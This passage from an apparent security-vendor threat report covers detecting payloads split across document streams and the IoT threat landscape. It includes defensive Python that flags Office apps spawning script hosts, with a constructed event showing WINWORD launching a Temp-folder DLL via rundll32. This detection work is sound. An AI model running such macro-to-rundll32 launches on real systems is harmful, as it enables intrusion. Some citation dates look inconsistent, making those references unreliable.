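The two results illustrate the argument of the section: no single fragment decodes to anything executable, so a per-stream scanner has nothing to flag, while the first fragment still contains the plain `TVqQ` string that a text signature would catch. A non-standard Base64 alphabet would remove that last foothold, leaving only the reassembly logic (or behavioral detection of the resulting process) as a detection point. The OLE (.doc) case needs an OLE parser to read the SummaryInformation streams; the reassembly function above is format-agnostic and takes the property strings once extracted.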

3.4 DCSO Recommendations


Common static scanners inspect files or streams one by one. An attacker can exploit this
behavior by dispersing a malicious payload across multiple files or streams.

DCSO recommendations are as follows:

• Complement simple file scanners with behavioral detection.


• Enable Windows command line process auditing.38
• Enhance logging capabilities with Sysmon39 or comparable products.
• Aggregate log information in a SIEM.
• The SIGMA rule repository40 provides many generic rules to detect behavioral
  anomalies. SIGMA rules can be converted into proprietary query languages
  supported by major SIEM vendors.
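As an added example of what command-line process auditing buys a defender (not DCSO's code and not a rule taken from the Sigma repository), the Python below runs Office-parent detection logic over a handful of constructed events shaped like Sysmon Event ID 1 records (ParentImage, Image, CommandLine). It picks out the pattern the APT28 macro above produces, WINWORD.EXE launching rundll32.exe with a module path in a user-writable directory, and the generic case of an Office application spawning a script or binary host. The process lists, path markers, user name and event contents are assumptions chosen for illustration.

```python
from typing import Dict, List, Tuple

# Assumed lists; a production rule would be tuned to the environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def image_name(path: str) -> str:
    """Lower-cased file name component of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_first_token(command_line: str) -> Tuple[str, str]:
    """Split a command line into the (possibly quoted) program and the rest."""
    s = command_line.strip()
    if s.startswith('"'):
        head, _, tail = s[1:].partition('"')
    else:
        head, _, tail = s.partition(" ")
    return head, tail.strip()


def rundll32_module_path(command_line: str) -> str:
    """Module argument of 'rundll32.exe "path",Export' or 'rundll32.exe path,Export',
    or '' when there is none."""
    _, args = split_first_token(command_line)
    if not args:
        return ""
    if args.startswith('"'):
        return args[1:].partition('"')[0]
    return args.partition(",")[0].split(" ", 1)[0]


def office_spawn_alerts(events: List[Dict[str, str]]) -> List[Tuple[int, str, str, str]]:
    """Process-creation events where an Office application spawned a script or
    binary host. Each hit is (event index, parent, child, reason)."""
    hits = []
    for i, ev in enumerate(events):
        parent = image_name(ev.get("ParentImage", ""))
        child = image_name(ev.get("Image", ""))
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        reason = "office parent"
        if child == "rundll32.exe":
            module = rundll32_module_path(ev.get("CommandLine", "")).lower()
            if any(marker in module for marker in USER_WRITABLE):
                reason = "office parent, rundll32 module in user-writable path"
        hits.append((i, parent, child, reason))
    return hits


# Constructed events (not real telemetry), shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'C:\Windows\System32\rundll32.exe "C:\Users\alice\AppData\Local\Temp\report.dll",KlpSvc'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 8192"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Users\alice\AppData\Local\Temp\a.ps1"},
]

if __name__ == "__main__":
    for hit in office_spawn_alerts(SAMPLE_EVENTS):
        print(hit)
```

Without command-line auditing, only the parent/child pair is visible and the second reason (the module living under AppData) cannot be evaluated, which is the point of the first two recommendations above; the same logic expressed as a Sigma rule converts to the query language of whichever SIEM holds the Sysmon events.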

38 Justin Turner, “Command line process auditing,” Microsoft, May 31, 2017, https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing.
39 Mark Russinovich & Thomas Garnier, “Sysmon v10.41,” Microsoft, September 16, 2019, https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon.
40 Florian Roth (Neo23x0), “Sigma,” GitHub, last accessed September 17, 2019, https://github.com/Neo23x0/sigma.

4 The IoT Threat Landscape Revisited


The last couple of months brought about important new insights into the threat landscape of
IoT devices, both as the target of state-sponsored attacks and as a target for cybercriminals
who find them to be easily exploitable. Some analysts have concluded that the wave of
current attacks targeting these devices in large botnet campaigns is only the tip of the
iceberg. Indeed, a recent TrendMicro report on the matter concluded that there are
extensive discussions within certain cybercriminal forums focusing on IoT devices and ways
in which to exploit them. While various outlets and security companies have reported on the
increasing volume of attacks targeting IoT devices, it is the more sophisticated and persistent
campaigns that will likely cause concern, especially in the future.41

Most reporting on so-called IoT attacks has focused on a range of different devices, from
routers to ordinary printers that were exposed to the internet. However, the overall
threat landscape is less clearly understood, and more insight would help prepare for
upcoming campaigns that exploit vulnerabilities to cause more harm than merely adding
the device to a botnet in continuous campaigns.42 As a result, companies should carefully
review the security of the applications and management tooling around these devices and
place them in tightly controlled, segregated network segments.

4.1 The Rising Tide of IoT Device Attacks


In the summer of 2018, the FBI and the Department of Homeland Security (DHS) released an
extensive risk advisory on the use and deployment of IoT devices that highlighted
foreseeable problems. For instance, IoT devices are engineered primarily for ease of use
rather than with a security-first mindset. This can expose plug-and-play devices to a range
of issues, such as easy-to-guess passwords, hardcoded credentials, and security options
that can only be adjusted by IT professionals, if at all.

Additionally, the sheer number of devices connected to the internet from the beginning of
2015 onwards, starting with the first Google and Amazon home assistants, created a much
larger attack surface than was previously thought possible. This large attack surface, in
combination with the often flawed security designs, has created a large, powerful source of
computing power and private data that is exploited en masse. This became especially
apparent when the first IoT-dedicated botnets arrived with the advent of Mirai and Hajime in
2016. Both botnets took over the targeted devices simply by brute-forcing embedded or
hardcoded passwords, using a list of the most common administrator credentials. These
passwords were left in the device, and consumers either did not know how to change them
or were not even aware of their existence.

41. "IoT Attack Opportunities Seen in the Cybercrime Underground," TrendMicro, September 10, 2019, https://blog.trendmicro.com/trendlabs-security-intelligence/iot-attack-opportunities-seen-in-the-cybercrime-underground/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Anti-MalwareBlog+%28Trendlabs+Security+Intelligence+Blog%29.
42. Brian Buntz, "A Year in Review: 12 IoT Security Considerations," IoTWorldToday, August 15, 2019, https://www.iotworldtoday.com/2019/08/15/a-year-in-review-12-iot-security-considerations/.

The Mirai botnet went on to become one of the largest threats of its kind and was used to
disrupt internet connectivity throughout the East Coast with one of the biggest denial-of-
service attacks recorded in history. Its danger lay not only in the ease with which the Mirai
botnet collected devices, but also in the versatility of the malware, which was the result of
collaborative development by the several parties involved. The ultimate goal of the Mirai
botnet owners was crime-as-a-service offerings for a range of different actors.43

The year 2017 brought about a move towards the exploitation of well-known vulnerabilities
in HTTP control interfaces that affected a range of different devices (primarily IP-based
cameras) in order to use their computing power for cryptocurrency mining. One of the most
interesting was the Reaper IoT botnet, which affected huge numbers of IoT devices in
2017.44

In 2018, researchers discovered VPNFilter, which appeared to be a first in many ways. First,
the code overlap with BlackEnergy suggested a link to Russian actors intent on targeting
Ukraine. Second, the malware, which infected routers and VPN devices, focused on
intercepting communication from SCADA systems used in manufacturing and maintenance.
Third, the malware affected nearly every router model on the market that had a
vulnerability at that point in time. The spread and capabilities of the malware prompted the
U.S. government to issue separate and dire warnings about it.45

In more recent news, the Russian group APT28 (also known as Fancy Bear) was exposed by
Microsoft for targeting and compromising IoT devices to gain access to a range of different
businesses. These devices included VoIP phones, office printers, and video decoders.
According to Microsoft's statement and subsequent conference presentation, the attackers
gained a foothold in a corporation's internal network by first targeting IoT devices that had
been placed on the outer perimeter of the company network for ease-of-use reasons. This
is a significant development for the importance of IoT devices and their security, as the
number of active and connected devices will only grow in the coming years.46

4.2 The Current Threat Landscape


The current developments in the IoT threat landscape can be described as uneven. While the
cybercriminal underground appears to have led the charge until now, state actors are
increasingly turning towards the many possibilities that these vulnerable devices offer, from
data streams that might contain private information to gaining access to company networks
and services connected with vulnerable devices.

43. "IoT Threat Landscape," F-Secure, September 1, 2019, https://s3-eu-central-1.amazonaws.com/evermade-fsecure-assets/wp-content/uploads/2019/04/01094545/IoT-Threat-Landscape.pdf.
44. Ibid.
45. Dan Goodin, "VPNFilter malware infecting 500,000 devices is worse than we thought," June 6, 2019, ArsTechnica, https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/.
46. Sergiu Gatlan, "Russian APT Abuses IoT Devices to Infiltrate Corporate Targets," August 5, 2019, BleepingComputer, https://www.bleepingcomputer.com/news/security/russian-apt-abuses-iot-devices-to-infiltrate-corporate-targets/.

The Cybercriminal Underground

The cybercriminal underground has long focused on vulnerabilities and exploits surrounding
the use of IoT networks; until 2019, this misuse has focused primarily on two methods. The
devices are taken over either to generate cryptocurrency or to supply large botnets for
denial-of-service attacks, spamming campaigns, and click fraud schemes. In the first
case, the infected device becomes part of a mining botnet and its computing power is stolen
to perform cryptocurrency mining calculations. These botnets are usually very widely
distributed and target a range of different devices. The second type of botnet requires more
management but can also be more lucrative and focused. Research by TrendMicro has
revealed that criminals are marketing different botnets based on specific devices and their
capacity to deliver. The most popular targets are by far home and small business
routers, which are continuously targeted through newly disclosed vulnerabilities or
password brute-forcing.47

An interesting observation from the cybercriminal underground is the development of
distinct focuses among IoT botnets. In general, these botnets are being built, managed, and
expanded by people who were previously active in creating botnets, not by a new generation
of criminals joining the market. Thus, the criminal activity has simply moved to the more
easily exploitable resource that is available. However, in the wake of these changes, malware
development has become much more open and versatile, as the Mirai botnet variants are
proving. For this botnet, many different groups and developers contributed modules to the
original malware or created their own spin-off that would be able to mine cryptocurrency.48

In general, several major trends can be highlighted from observation and analysis of
documented cybercriminal underground conversations:

• There is a general move towards the development of specific malware for different
subsets of IoT devices, and therefore towards different monetization models that go with
this specialization. This means that clients should expect targeted attacks against their IoT
device subsets with accompanying threats (such as IP camera takeover and demands
for ransom money).
• Criminals are keenly aware that the development of smart factories and production
facilities will require greater connectivity with the wider internet. Criminals are
already discussing the possibility of holding these devices to ransom and disrupting
operations if they feel they are not compensated for their services.

47. Shaun Mirani, Joshua Meyer, Rick Ramgattie and Ian Sindermann, "SOHOpelessly Broken 2.0," September 16, 2019, ISE, https://www.securityevaluators.com/whitepaper/sohopelessly-broken-2/.
48. Stephen Hilt, Vladimir Kropotov, Fernando Mercês, Mayra Rosario, and David Sancho, "The Internet of Things in the Cybercrime Underground," September 10, 2019, TrendMicro Research, https://documents.trendmicro.com/assets/white_papers/wp-the-internet-of-things-in-the-cybercrime-underground.pdf.

• There will be a greater variety of toolkits to fit the expected move towards 5G, which
is expected to add anything from cars to lawn mowers to the IoT landscape. These
toolkits will be more and more focused on a two-stage approach: if the password-
guessing stage fails, a second stage within the toolkit will attempt common
vulnerabilities.

These developments are all very troubling, but the most important development is the idea
of targeting smart factory and smart home appliances for ransom. One IoT threat has
already moved in that direction: home NAS appliances are being targeted with ransomware,
which is quite easy to deliver, and DCSO has observed several compromised NAS servers
whose contents, possibly including relevant work documents of individuals or companies,
were encrypted.49 While this general approach requires a substantial amount of effort and
also exposure, it is exponentially more lucrative and will be performed by organized groups.
Russian-speaking and Brazilian forums in particular appear to be focusing on these types of
threats.

State Actors

While the discussion about vulnerabilities in IoT devices has focused on cybercriminal actors
and is usually dominated by headlines of the large botnets or a fast-spreading infection
mechanism, state actors have recognized the IoT landscape as an interesting attack vector as
well. Two important examples of this behavior come from Russian groups, which have
created their own fast-growing botnet and also managed to compromise a corporate IT
network with devices set at the perimeter that were easily compromised by a combination
of default passwords and known vulnerabilities.

A major difference between the state-sponsored attacks and the cybercriminal activity
remains the discriminate targeting. While the VPNFilter malware appeared to be relatively
indiscriminate at first, it was essentially designed to detect, filter, and steal information
regarding SCADA systems. Additionally, the malware also attempted to harvest credentials
that were transferred over the router for possible later use in targeted campaigns.
Notably, the malware was also designed to remove competing malware and backdoors
from the infected router in order to avoid discovery, and it had capabilities to survive
superficial removal attempts.50

While the targeting is one specific indicator, as shown by the case in which Microsoft
demonstrated that only four devices in total were infected for a successful corporate
network compromise, more technically sophisticated malware is another.51

49. Tim Berghoff, "Ransomware: Botnetz-Angriff gegen NAS-Systeme," July 27, 2019, GData, https://www.gdata.de/blog/2019/07/35191-botnetz-angriff-gegen-nas-systeme.
50. Dan Goodin, "VPNFilter malware infecting 500,000 devices is worse than we thought," June 6, 2019, ArsTechnica, https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/.
51. "Corporate IoT – a path to intrusion," August 8, 2019, Microsoft Security Response Center, https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/.

Future trends based on the research about VPNFilter and network compromises point
towards the following developments in state-sponsored attacks:

• The increased attack surface and the slow but steady move of critical infrastructure
devices online (even if they are only cars or smart meters) make IoT a lucrative
target for state-sponsored attackers.52
• IoT devices are also often deployed at the perimeter of organizations, especially for
subsidiaries or for individuals working in sales, local office presence, and other
regional representations. This gives state-sponsored attackers another attack
vector into the wider company network for a supply chain compromise.
• IoT devices sometimes carry highly sensitive information and are easy to hijack,
making them an ideal way for attackers to compromise individuals and use their
access to attack the companies or institutions for which these people work.

4.3 DCSO Conclusions and Recommendations


Fundamentally, two different problems shape the IoT threat landscape. The first is the
inability of manufacturers and producers to properly secure devices and patch them
regularly. Basically, this amounts to a systems security flaw that most casual users of IoT
devices cannot address on their own. The second problem comes from the potential of IoT
devices. Their projected ubiquity and reach make them a much more lucrative target for
state-sponsored attackers as well as criminals.53 Managing the potential risks of IoT
compromise will require a substantial amount of effort and time.

DCSO recommendations are as follows:

• Establish and revisit policies on IoT devices, if you have not already done so. Clearly
define rules and responsibilities as well as positions on the perimeter when it comes
to IoT devices, especially for devices that employees bring to work or use when
working from home.
• For smart meters, SCADA systems, or building management applications, there
should be a clearly defined and more tightly controlled environment than for other
IoT devices. There should also be a clear strategy in place for how to regularly patch
and monitor these systems.
• If possible, only rely on products from vendors that have worked with the relevant
national and international standards bodies and have implemented the changes
demanded by security experts and researchers.

52. Danny Palmer, "Cybersecurity: These are the Internet of Things devices that are most targeted by hackers," June 12, 2019, ZDNet, https://www.zdnet.com/article/cybersecurity-these-are-the-internet-of-things-devices-that-are-most-targeted-by-hackers/.
53. Charlie Osborne, "Popular consumer and enterprise routers, IoT devices contain remote access vulnerabilities," September 16, 2019, ZDNet, https://www.zdnet.com/article/iot-security-has-become-worse-in-the-last-five-years/.